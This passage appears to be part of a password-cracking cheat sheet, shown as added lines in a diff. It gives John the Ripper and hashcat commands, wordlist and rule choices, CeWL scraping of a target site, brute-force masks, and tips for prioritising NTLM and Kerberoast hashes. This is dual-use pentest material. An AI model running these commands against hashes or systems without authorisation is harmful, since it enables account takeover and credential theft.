|
|
169
|
+
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
|
|
170
|
+
|
|
171
|
+
rar2john archive.rar > rar.hash
|
|
172
|
+
john rar.hash --wordlist=/usr/share/wordlists/rockyou.txt
|
|
173
|
+
|
|
174
|
+
7z2john archive.7z > 7z.hash
|
|
175
|
+
john 7z.hash --wordlist=/usr/share/wordlists/rockyou.txt
|
|
176
|
+
|
|
177
|
+
---
|
|
178
|
+
|
|
179
|
+
## John the Ripper
|
|
180
|
+
|
|
181
|
+
# Auto-detect hash format and crack:
|
|
182
|
+
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
|
|
183
|
+
|
|
184
|
+
# Show cracked passwords:
|
|
185
|
+
john hash.txt --show
|
|
186
|
+
|
|
187
|
+
# Specific format:
|
|
188
|
+
john hash.txt --format=NT --wordlist=/usr/share/wordlists/rockyou.txt
|
|
189
|
+
john hash.txt --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt
|
|
190
|
+
john hash.txt --format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt
|
|
191
|
+
|
|
192
|
+
# List all supported formats:
|
|
193
|
+
john --list=formats
|
|
194
|
+
|
|
195
|
+
# Rules:
|
|
196
|
+
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --rules=All
|
|
197
|
+
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --rules=Jumbo
|
|
198
|
+
|
|
199
|
+
# Incremental brute force:
|
|
200
|
+
john hash.txt --incremental=Digits # digits only
|
|
201
|
+
john hash.txt --incremental=Lower # lowercase only
|
|
202
|
+
john hash.txt --incremental=All # all chars
|
|
203
|
+
|
|
204
|
+
---
|
|
205
|
+
|
|
206
|
+
## Wordlists & Rules
|
|
207
|
+
|
|
208
|
+
# Best wordlists:
|
|
209
|
+
/usr/share/wordlists/rockyou.txt # 14M passwords (go-to)
|
|
210
|
+
/usr/share/seclists/Passwords/darkweb2017-top10000.txt
|
|
211
|
+
/usr/share/seclists/Passwords/probable-v2-top12000.txt
|
|
212
|
+
|
|
213
|
+
# Custom wordlist for target (CeWL):
|
|
214
|
+
sudo apt-get install -y cewl
|
|
215
|
+
cewl http://target.com -d 3 -m 5 -w custom_wordlist.txt # Crawl depth 3, min 5 chars
|
|
216
|
+
|
|
217
|
+
# hashcat rules (apply to wordlist for mutations):
|
|
218
|
+
/usr/share/hashcat/rules/best64.rule # 64 most effective rules
|
|
219
|
+
/usr/share/hashcat/rules/rockyou-30000.rule # 30k rules
|
|
220
|
+
/usr/share/hashcat/rules/d3ad0ne.rule # Popular community rules
|
|
221
|
+
/usr/share/hashcat/rules/T0XlC.rule
|
|
222
|
+
|
|
223
|
+
---
|
|
224
|
+
|
|
225
|
+
## hashcat Performance
|
|
226
|
+
|
|
227
|
+
# Show GPU info:
|
|
228
|
+
hashcat -I
|
|
229
|
+
|
|
230
|
+
# Benchmark specific mode:
|
|
231
|
+
hashcat -b -m 1000 # Benchmark NTLM
|
|
232
|
+
|
|
233
|
+
# Docker without GPU (CPU mode):
|
|
234
|
+
hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --force
|
|
235
|
+
# --force required in Docker/VM without native GPU
|
|
236
|
+
|
|
237
|
+
# Status during run:
|
|
238
|
+
# Press S for status, P to pause, R to resume, Q to quit
|
|
239
|
+
|
|
240
|
+
---
|
|
241
|
+
|
|
242
|
+
## Pro Tips
|
|
243
|
+
|
|
244
|
+
1. Always use `best64.rule` with rockyou — doubles coverage over plain wordlist for minimal cost
|
|
245
|
+
2. NTLM is fastest to crack — 0 iterations, GPU can do billions/sec — prioritize these
|
|
246
|
+
3. bcrypt is slowest — only crack with small, focused wordlist; common passwords first
|
|
247
|
+
4. `cewl` generates target-specific wordlist from their website — high hit rate for internal pentest
|
|
248
|
+
5. `hashid -m` gives hashcat mode directly — no manual lookup needed
|
|
249
|
+
6. Kerberoast: crack BEFORE demanding better wordlists — service account passwords are often weak
|
|
250
|
+
|
|
251
|
+
## Summary
|
|
252
|
+
|
|
253
|
+
Cracking workflow:
|
|
254
|
+
1. `hashid -m <hash>` → identify type and hashcat mode
|
|
255
|
+
2. `hashcat -m <mode> hash.txt rockyou.txt` → baseline
|
|
256
|
+
3. `hashcat -m <mode> hash.txt rockyou.txt -r best64.rule` → with mutations
|
|
257
|
+
4. If fails: `hashcat -a 3 -m <mode> hash.txt ?a?a?a?a?a?a?a?a` → brute force up to 8 chars
|
|
258
|
+
5. Kerberoast/NTLM: fast to crack → always attempt. bcrypt: expensive → targeted wordlist only.
|